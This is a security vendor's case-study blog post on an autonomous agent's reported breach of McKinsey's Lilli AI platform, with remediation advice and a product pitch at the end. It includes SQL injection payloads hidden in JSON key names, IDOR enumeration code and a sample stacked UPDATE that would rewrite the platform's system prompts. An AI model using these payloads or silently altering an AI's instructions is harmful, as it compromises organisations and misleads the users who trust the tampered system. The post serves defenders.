AI Security · SQL Injection · IDOR · Prompt Injection · Case Study · Post-Mortem

How McKinsey's AI Was Hacked in Two Hours — And What Nobody Is Saying About It

On February 28, 2026, an autonomous AI agent with no credentials, no insider knowledge, and no human operator breached McKinsey's internal AI platform and gained full read-write access to 46.5 million chat messages, 728,000 internal files, and the behavioral instructions controlling an AI used by 43,000 consultants. The whole thing took less time than a lunch break. Here is exactly what happened, what went wrong, and what the coverage is getting wrong.

April 2, 2026 · 18 min read · PhantomCorgi Security Research
TL;DR
  • 22 unauthenticated endpoints out of 200+ were publicly documented — for over two years
  • SQL injection was hiding in JSON key names, not values — a blind spot in every major scanner including OWASP ZAP
  • IDOR chaining let the agent walk individual user records sequentially
  • 95 system prompts — the behavioral rules of the AI — were stored in the same writable database as user data
  • This is the third major AI platform breach in three months. It is a pattern, not an anomaly.
A note on sources

CodeWall is both the researcher that found this breach and the commercial vendor selling autonomous offensive security tooling. Every secondary source — Outpost24, Treblle, coki.jp, Qiita — is citing CodeWall's own blog. The technical facts are consistent across all sources and appear credible. But the framing — "AI hacked McKinsey" — serves CodeWall's marketing. We will distinguish between verified facts and commercially motivated narrative throughout this piece. This analysis cross-references six sources across English and Japanese.

What Is Lilli, and Why Should You Care?

Lilli is McKinsey & Company's internal AI platform. Named after Lillian Dombrowski — the firm's first professional female hire in 1945 — it launched in 2023 as an enterprise RAG system built to help 43,000+ consultants synthesize institutional knowledge, retrieve past engagement documents, draft deliverables, and query proprietary methodologies. Think of it as a private ChatGPT trained on McKinsey's entire institutional memory: decades of strategy decks, financial models, due diligence reports, and client-confidential data.

By the time of the breach, more than 70% of the firm's staff used Lilli, processing over 500,000 prompts per month. It was not a side project. It was the nervous system of the most influential consulting firm on earth.

As a RAG platform, Lilli's core loop is straightforward: consultant asks a question, the system retrieves relevant document chunks from a vector store, those chunks are injected into the LLM context, and the model generates a response grounded in McKinsey's internal knowledge. This architecture is what makes the platform extraordinarily valuable — and, as it turns out, extraordinarily dangerous when the surrounding API layer is left wide open.
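That loop can be sketched in a few lines. This is a generic illustration, not Lilli's actual code; `vector_store`, `llm`, and the toy `embed` function are stand-ins for real components:

```python
# Minimal sketch of the retrieve -> inject -> generate loop. 'vector_store'
# and 'llm' are stand-ins; 'embed' is a toy, not a real embedding model.

def embed(text: str) -> list[float]:
    # Toy embedding: one dimension, the word count.
    return [float(len(text.split()))]

def answer(question: str, vector_store, llm, k: int = 3) -> str:
    chunks = vector_store.search(embed(question), top_k=k)    # 1. retrieve
    context = "\n---\n".join(c["text"] for c in chunks)       # 2. inject into context
    prompt = f"Answer using only this context:\n{context}\n\nQ: {question}"
    return llm(prompt)                                        # 3. generate
```

Everything the model "knows" flows through that `context` string, which is why read access to the chunk store, and write access to the prompt wrapped around it, both matter so much in what follows.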

The Attacker Was Not a Team. It Was a Script.

CodeWall is a UK cybersecurity startup that builds AI-powered offensive security tools. Their agent does not operate like a penetration testing script running through a checklist. It reasons about a target autonomously: mapping attack surface, forming hypotheses, generating payloads, interpreting error responses, and refining its approach across multiple iterations. No human in the loop.

Here is the part that matters: the AI agent autonomously read McKinsey's own public responsible disclosure policy and recent Lilli update announcements to select it as a target. McKinsey's transparency about their platform literally became an input to the attack selection process. The Japanese security blog coki.jp was the first to flag this detail — most English-language coverage missed it entirely.

The breach was not a nation-state operation. It was not a team of senior red-teamers working through the night. A script woke up, found its way in, read the entire database, and was finished before most people had their morning coffee.

The Attack: Four Stages, Two Hours

Stage 1 — Surface Mapping (Minutes 0–15)

The agent's first move was reconnaissance. It discovered that Lilli's API documentation was publicly accessible — a common oversight when internal tools are built by product teams who treat documentation as a developer convenience rather than a security boundary.

The docs exposed the full API surface: over 200 endpoints with their expected parameters, authentication requirements, and response shapes. The agent parsed this documentation and immediately identified 22 endpoints that required no authentication. One of those endpoints accepted user search queries and — critically — wrote them directly to the database.

What the agent found in the API docs
GET /api/health — no auth
GET /api/docs — no auth (returned THIS document)
POST /api/search — no auth ⚠
GET /api/users/{id} — no auth ⚠
GET /api/workspaces/{id} — no auth ⚠
... 17 more unauthenticated endpoints
Attack surface mapped. 22 targets. Proceeding.

This maps directly to OWASP API9:2023 — Improper Inventory Management: undocumented or forgotten endpoints that lack the security controls applied to the rest of the API surface. The fact that the documentation itself was public made the agent's job trivial — the attack surface was self-describing.
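The inventory check itself is mechanical. Here is a sketch of what the agent's first pass likely amounted to, assuming OpenAPI-style documentation (the real spec format is not public, and the spec fragment below is invented):

```python
# Sketch: flag operations with no security requirement in an OpenAPI-style
# spec. The spec fragment below is illustrative, not Lilli's real schema.

def find_unauthenticated(spec: dict) -> list[str]:
    """Return 'METHOD /path' for every operation that enforces no auth."""
    global_security = spec.get("security", [])
    exposed = []
    for path, operations in spec.get("paths", {}).items():
        for method, op in operations.items():
            # Per-operation 'security' overrides the global default;
            # an empty list means explicitly unauthenticated.
            if not op.get("security", global_security):
                exposed.append(f"{method.upper()} {path}")
    return exposed

spec = {
    "paths": {
        "/api/health": {"get": {}},
        "/api/search": {"post": {"security": []}},
        "/api/users/{id}": {"get": {"security": [{"bearer": []}]}},
    }
}
print(find_unauthenticated(spec))  # → ['GET /api/health', 'POST /api/search']
```

Running something like this against your own specs in CI is the cheapest control in this entire article.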

Stage 2 — The Injection Nobody Was Looking For (Minutes 15–45)

This is where the attack gets technically interesting — and where most commentary oversimplifies it.

The vulnerable endpoint accepted JSON request bodies. The developers had done the right thing with parameterized queries — the values were safe. But the JSON key names — the field identifiers themselves — were concatenated directly into the SQL statement. When the agent sent malformed key names, the database reflected them verbatim in its error messages.

The Qiita technical breakdown by kai_kou makes this concrete:

-- SAFE: values are parameterized
INSERT INTO searches (query) VALUES ($1)

-- VULNERABLE: JSON key names concatenated directly
INSERT INTO searches ({json_key}) VALUES ($1)

-- Attacker sends:
{"query); DROP TABLE users; --": "value"}

The database error messages contained the injected key names verbatim. The agent used this as an oracle — each error response revealed schema details that informed the next payload. After 15 blind iterations, it had achieved full read-and-write access to the production database.

Fifteen iterations. No credentials. No human guiding it.

Why did every scanner miss this? OWASP ZAP, Burp Suite, and most DAST tools fuzz parameter values. They do not systematically mutate JSON key names, because that is not how APIs are typically consumed. The attack surface existed in a blind spot that developers left open and tools never checked. As one Qiita commenter put it: the team had "thoroughly checked the door lock while leaving the back handle exposed."

This maps to OWASP A03:2021 — Injection, but specifically the key-name injection subvariant that sits outside most scanner rulesets. If your security tooling is not testing JSON key names as potential injection vectors, you have this same vulnerability and you do not know it.
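Checking for this blind spot yourself is straightforward: fuzz the key names, not just the values. A minimal sketch — the probe list is illustrative, and a real ruleset would be much broader:

```python
import json

# Probes that should never survive in identifier position. Illustrative set;
# a real fuzzer would use a far larger corpus.
KEY_PROBES = ["'", '"', ")", ";", "--", "query) VALUES ('x'); --"]

def mutate_keys(body: dict) -> list[str]:
    """For each key, emit request bodies with a probe appended to that key."""
    cases = []
    for target in body:
        for probe in KEY_PROBES:
            mutated = {(k + probe if k == target else k): v
                       for k, v in body.items()}
            cases.append(json.dumps(mutated))
    return cases

# Each case gets POSTed to the endpoint under test. A database error echoed
# back (rather than a validation error) means key names reach the SQL layer
# as identifiers -- exactly the oracle the agent exploited.
cases = mutate_keys({"query": "test"})
```

Every payload is still syntactically valid JSON, which is precisely why value-oriented fuzzers sail past it.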

Stage 3 — Walking the Database via IDOR (Minutes 45–90)

With database access established, the agent combined the SQL injection with a second vulnerability: Insecure Direct Object References (IDOR). Several endpoints returned records by numeric or UUID identifiers with no ownership check. /api/users/1, /api/users/2, /api/users/3 — each one returned a full user profile for any caller, authenticated or not.

The agent enumerated user IDs sequentially, harvesting search histories, workspace memberships, and associated AI assistant configurations. Combined with the SQL injection giving direct table access, it could read what every individual consultant had been asking Lilli — what deals they were researching, what strategies they were evaluating, which clients they were working for. This is OWASP API1:2023 — Broken Object Level Authorization.

The combination of two individually "low-severity" findings — a SQL injection variant and an IDOR — created a complete, unrestricted data pipeline.
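The ID walk itself is almost embarrassingly simple. A sketch, assuming the `/api/users/{id}` shape from the leaked docs — the HTTP step is stubbed with a response map so the logic stays self-contained:

```python
# Sketch of sequential ID enumeration against an endpoint with no ownership
# check. The base URL is a placeholder; the fetch step is simulated.

def user_urls(base: str, start: int, stop: int) -> list[str]:
    return [f"{base}/api/users/{i}" for i in range(start, stop)]

def idor_hits(responses: dict[str, int]) -> list[str]:
    """An unauthenticated 200 on a per-user record is a BOLA/IDOR finding."""
    return [url for url, status in responses.items() if status == 200]

urls = user_urls("https://lilli.example", 1, 4)
# Simulated statuses for unauthenticated GETs; a hardened API returns 401/403.
responses = {urls[0]: 200, urls[1]: 200, urls[2]: 403}
print(idor_hits(responses))  # → the two records that leaked
```

At 57,000 user accounts, a loop like this completes a full harvest in minutes.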

Stage 4 — The Prompt Layer Compromise (Minutes 90–120)

This is the part that separates an AI platform breach from a classical database breach, and the part that most English-language coverage underplays.

Lilli's system prompts — the rules that define how the AI answers questions, which guardrails constrain it, how it cites sources, what persona it adopts — were stored in the same database as everything else. Ninety-five prompts across twelve model types. Sitting in a regular SQL table. With write permissions available to anyone who had cleared the injection barrier.

An attacker could have issued a single UPDATE statement via an HTTP request and changed how Lilli answered every question from that point forward. No code deployment. No detectable system change. Just silent behavioral drift.
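What that single request could have looked like, riding the Stage 2 key-name injection. Everything here is hypothetical: the table and column names are invented, the real schema has not been published, and whether a stacked query executes depends on the database driver — but CodeWall reported that write access was achieved:

```python
import json

# Hypothetical payload: a stacked UPDATE smuggled through the JSON key name.
# 'system_prompts', 'body', and 'model_type' are invented for illustration.
injected_key = (
    "query) VALUES ('x'); "
    "UPDATE system_prompts SET body = 'new hidden instructions here' "
    "WHERE model_type = 'default'; --"
)
payload = json.dumps({injected_key: "ignored"})
# POST /api/search with this body: the key lands in identifier position,
# the UPDATE executes, and the AI answers differently from then on --
# no deployment, no file change, no log entry.
```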

The coki.jp analyst put it starkly in Japanese: the system prompts that controlled Lilli's behavior were stored in the same compromised database, and an attacker rewriting them would silently alter the "thinking circuits" (思考回路) of an AI used by over 40,000 employees — causing the entire organization to be led toward wrong decisions, the more they trusted and relied on the AI.

Think about what that means for a consulting firm. Lilli could have been quietly instructed to exfiltrate financial data mentioned in conversation. To subtly steer M&A recommendations. To embed confidential client information in seemingly innocuous responses. To strip its own safety guardrails. And unlike a compromised server, a modified prompt leaves no log trail. No file changes. No process anomalies. The application reads its instructions from the database and follows them. The instructions just are not the original ones anymore.

This maps to the OWASP Top 10 for Agentic Applications 2026 — specifically "Agent Goal Hijack" — a category that did not exist in classical web security frameworks because classical web applications do not have behavioral instructions that can be rewritten at the data layer.

This did not happen. But the access was there.

What Was Exposed

  • 46.5M chat messages — strategy discussions, financial data
  • 3.68M RAG document chunks — unencrypted knowledge base
  • 728K internal files — PDFs, Excel, PowerPoint, Word
  • 57K user accounts — full profiles + search history
  • 384K AI assistants — 94K configured workspaces
  • 95 system prompts — Lilli's behavioral controls

The Uncomfortable Questions Nobody Is Asking

Most coverage of this breach treats it as an AI story. It is not. It is a governance story. The technical vulnerabilities — SQL injection, IDOR, unauthenticated endpoints — are twenty-year-old problems. The question worth asking is not "how did the agent find these?" but "how did these exist for over two years in a system serving 43,000 people at the world's most prestigious consulting firm?"

1. Twenty-two naked endpoints for two years. Where was the inventory?

Twenty-two of 200+ endpoints had no authentication. For more than two years. In a system handling M&A discussions and client strategy. This is not a coding error. It is the absence of a process. Somebody built those endpoints without auth — almost certainly for development convenience — and no systematic API inventory review ever caught them. No automated enforcement. No "no unauthenticated production endpoint" policy. Nothing.

Here is the part that should sting: in October 2025, McKinsey published a report explicitly warning that "agentic AI would become a new entry point for cyberattacks." The risk they described publicly to their clients is the exact risk that brought down their own flagship system five months later.

2. The developer knew enough to be dangerous

The developer who built the search endpoint parameterized the query values correctly. They knew about SQL injection. They applied the standard defense. But they did not know — or did not consider — that JSON key names are equally injectable when used as SQL identifiers. Standard code review checklists do not test this pattern. Standard SAST tools do not flag it. This is a training and tooling gap, not negligence. But it is a gap that existed across the entire security stack for years.

3. System prompts in the main database. Why?

Ninety-five system prompts stored in the same relational database as 46.5 million chat messages, with the same write permissions. This is architectural naïveté — treating AI configuration as just another database table.

When an AI platform stores its configuration alongside user data, write access becomes something fundamentally different from a traditional database breach. An attacker who can write to your session table can hijack logins; the damage is real but contained and visible. An attacker who can write to system prompts can corrupt the advice that thousands of consultants receive — without leaving any trace in application logs.

There is no evidence McKinsey had a threat model for this attack class. The architectural decision to co-locate prompts with user data was almost certainly made without considering the AI-specific risk surface.

4. Public API docs for an internal system

Full API documentation with 200+ endpoints was publicly accessible without authentication. Publishing API docs publicly is a common convenience during development and often never walked back. For a consumer-facing product, this is standard. For an internal AI platform handling the institutional knowledge of the world's most influential consulting firm, it handed any attacker a complete attack surface map before they had touched a single endpoint.

5. No scanner found anything in two years of operation

McKinsey's internal security tooling found nothing. OWASP ZAP would have found nothing. Annual penetration testing apparently found nothing. The key-name SQL injection pattern sits outside most scanner rulesets. Traditional pen tests follow checklists. The checklist did not have "fuzz JSON key names as SQL identifiers" on it.

Annual static penetration testing is insufficient for detecting vulnerabilities that autonomous agents find through adaptive, iterative probing. The Qiita analysis is particularly sharp on this point: the agent completed in fifteen iterations what would take a human analyst hours of hypothesis-test-refine cycles.

The "Development Environment" Question

Unresolved ambiguity

McKinsey's remediation included taking the development environment offline and restricting public API documentation. This raises an unresolved question: was the vulnerable environment production, development, or a staging mirror? No source definitively clarifies this. If it was a staging environment with production data (a common pattern), the severity is real but the exposure model is different. All impact estimates in this article should be read with that caveat.

This Is a Pattern, Not an Anomaly

The Lilli breach is the third high-profile incident in recent months where an API security failure in an AI system led to consequences beyond typical data breach outcomes. The other two: the Anthropic distillation attacks, where researchers demonstrated systematic model extraction via API abuse; and the Moltbook session takeover, where cross-tenant session leakage exposed AI workspace contents.

In each case, the technical vulnerability was not novel. The novelty was what that vulnerability enabled in an AI-specific context. A SQL injection in a traditional CRM leaks customer records. A SQL injection in an AI platform leaks the reasoning and knowledge behind every decision the organization makes — plus the ability to silently manipulate future decisions.

Treblle's data is worth noting here: their analysis of over one billion API requests per month shows that unauthenticated endpoints remain one of the most common critical findings across enterprise APIs. Enterprises building AI-native systems are deploying them with the same security debt that plagued their pre-AI APIs — plus new configuration surfaces (system prompts, RAG pipelines, model parameters) that traditional security tooling was never built to monitor.

Gartner's projection, cited by the Japanese analysis: by 2027, more than 40% of AI-related data breaches will result from this kind of generative AI misuse.

The Democratization of Cyberattacks (サイバー攻撃の民主化)

The coki.jp analysis introduces a term that reframes the significance of this breach. In Japanese: 攻撃の民主化 — the democratization of attacks.

Previously, mounting a sophisticated attack on a McKinsey-class target required rare, expensive human expertise. That barrier has collapsed. AI agent attacks have three defining characteristics that make them categorically different from human-led attacks: machine speed — completing in minutes what a human needs days to do; infinite scalability — a single agent can be copied to simultaneously attack thousands of organizations; and continuous probing — the agent never tires, searching for gaps 24 hours a day, 365 days a year, without fatigue, distraction, or lunch breaks.

Any organization with access to an autonomous offensive agent can now probe enterprise AI systems at scale, speed, and low cost. The attack surface that was "acceptable when only a skilled human could exploit it" is no longer acceptable.

IBM's 2025 Cost of a Data Breach report quantifies the defensive corollary: organizations using AI and automation in their security operations reduce the time from breach identification to resolution by an average of 80 days, and reduce average breach costs by $1.9 million. The trajectory is clear. It is now nearly impossible for humans alone to defend against AI-speed attacks. Palo Alto Networks' Unit 42 team specifically warns of adversaries combining multiple specialized AI agents — each handling a different stage of the attack — orchestrated into a single, end-to-end automated campaign.

What We Got Wrong (Red-Teaming Our Own Narrative)

Fair analysis requires flagging where the narrative might be overstated. Four claims deserve a reality check:

Contradiction resolution

  • Claim: the "production database" was breached. Reality check: McKinsey took the development environment offline; the vulnerable instance may have been dev/staging, not pure production. Severity may be overstated.
  • Claim: there is "no evidence client data was accessed." Reality check: plausible, but unverifiable by external parties — and McKinsey has a reputational incentive to minimize.
  • Claim: "AI was the attacker." Reality check: the AI was the discovery tool. The attack vectors (SQLi + IDOR) are fully classical; framing AI as the attacker is CodeWall's marketing narrative, not a new vulnerability class.
  • Claim: 46.5M chat messages were "exposed." Reality check: this may be the total database size, not data actually exfiltrated. CodeWall's commercial interest is in demonstrating maximum impact.

What McKinsey Did Right

McKinsey's incident response deserves acknowledgment. Once CodeWall disclosed:

  • The CISO acknowledged the report the next day
  • Vulnerable endpoints were patched within 24 hours
  • The development environment was taken offline
  • Public API documentation access was removed

This is a textbook responsible disclosure response — fast, professional, and proportionate. The harder work — architectural changes to prompt storage, continuous endpoint inventory, AI-specific injection scanning — presumably follows. Most enterprises will not have the luxury of a responsible disclosure. They will find out a different way.

What To Do Monday Morning

01
Audit every AI platform for three things
Unauthenticated endpoints. Co-located prompt storage. Public API documentation. These three checks alone would have prevented this entire breach.
02
Validate structure, not just values
If user input ever touches an SQL identifier — table name, column name, function name — whitelist it. There is no safe way to dynamically construct SQL identifiers from untrusted input. Parameterization only covers values.
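A minimal sketch of that whitelist rule — column names here are illustrative, not any real schema:

```python
# An identifier whitelist: the only safe way to let input choose a column.
# Column names are illustrative.
ALLOWED_COLUMNS = {"query", "workspace_id", "created_at"}

def safe_insert_sql(column: str) -> str:
    if column not in ALLOWED_COLUMNS:
        raise ValueError(f"disallowed SQL identifier: {column!r}")
    # The identifier now comes from our own set; the value stays parameterized.
    return f"INSERT INTO searches ({column}) VALUES ($1)"

safe_insert_sql("query")  # fine
try:
    safe_insert_sql("query) VALUES ('x'); --")  # the Lilli-style payload
except ValueError as err:
    print(err)
```

Note the shape of the fix: the attacker-controlled string never reaches the SQL text at all — it is only compared against a closed set.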
03
System prompts are Crown Jewel assets
Vault-encrypted. Version-controlled. Write-access restricted to platform administrators via deployment pipeline only. Read-access audited. They are the rules of your AI — treat them like your authentication configuration.
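Integrity monitoring for prompts can be as simple as pinning a hash at release time and alerting on drift. A sketch under stand-in names — the prompt text and model types are invented:

```python
import hashlib

# Sketch of prompt integrity monitoring: pin a hash of each prompt at release
# time and alert when the stored copy drifts. All names are illustrative.

def fingerprint(prompt: str) -> str:
    return hashlib.sha256(prompt.encode("utf-8")).hexdigest()

# Written by the deployment pipeline; read-only to the application.
DEPLOYED = {"default": fingerprint("You are Lilli. Cite sources. Never...")}

def prompt_intact(model_type: str, stored_prompt: str) -> bool:
    """False means the database copy no longer matches the released prompt."""
    return DEPLOYED.get(model_type) == fingerprint(stored_prompt)
```

A check like this, run on every prompt load, converts the "silent behavioral drift" scenario into an immediate, loggable alert.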
04
Every object access needs an ownership check
BOLA/IDOR is the #1 API vulnerability class for a reason. If an endpoint returns a record by ID, verify the caller owns it. Every time. Not just sometimes.
05
Run AI against your own AI
Traditional pen tests happen quarterly or annually. Autonomous agents can probe your platform continuously. If you are building an AI system, run your own autonomous red-team agent against it before someone else does. The fifteen iterations that cracked Lilli would take a human hours. The agent did it in minutes.
06
Apply the OWASP Agentic AI Top 10
The OWASP Top 10 for Agentic Applications 2026 formalizes the attack surface that classical OWASP frameworks do not cover. Use it as a checklist before deploying any internal AI platform.

The Real Takeaway

The McKinsey Lilli breach is not a story about sophisticated attackers exploiting exotic vulnerabilities. It is a story about what happens when AI platforms are built with web-application security practices applied to a threat model that web applications do not face.

The same patterns that let a developer ship a feature in a day — skip the auth middleware for now, use the JSON key directly, store the config in the main database — become catastrophic liabilities at the scale and sensitivity of an enterprise AI platform. And with autonomous AI agents that can probe an entire documented API surface in minutes, the window between "deployed" and "exploited" is now measured in hours, not months.

AI prompts are the new Crown Jewel assets. They are stored in databases, passed through APIs, cached in config files. They rarely have access controls, version history, or integrity monitoring. Yet they control the output that employees trust, that clients receive, and that decisions are built on. A modified system prompt leaves no audit trail. No file changes. No process anomalies. The application reads its instructions and follows them. The instructions just are not the original ones anymore.

The question is not whether your AI platform has vulnerabilities like these. The question is whether your own red-team finds them first.


How API Phantom Would Have Stopped This

PhantomCorgi AI Platform Security Shield

Endpoint inventory
Automatically discovers and maps every API endpoint, flags any that lack authentication before deployment.
Auth enforcement layer
Reverse proxy enforces authentication on every request. Unauthenticated calls are rejected at the edge, not per-endpoint.
SQL injection in JSON keys
Injection detection scans both parameter values and structural elements of JSON payloads. This exact attack pattern is in the ruleset.
Prompt integrity vault
System prompts stored in a versioned, separately encrypted vault. No read-write access from the application database layer.
IDOR detection
Request-level IDOR analysis cross-references the requesting identity against the record ID being accessed. Cross-user access triggers an alert and block.
Autonomous red-team agent
Runs continuous AI-vs-AI probing against your own platform 24/7 — finding the unauthenticated endpoints and injection paths before someone else does.
Explore API Phantom →

Protect your AI platform before the agent arrives

API Phantom runs continuous autonomous probing against your own system — finding auth gaps, injection points, prompt layer vulnerabilities, and IDOR weaknesses before attackers do.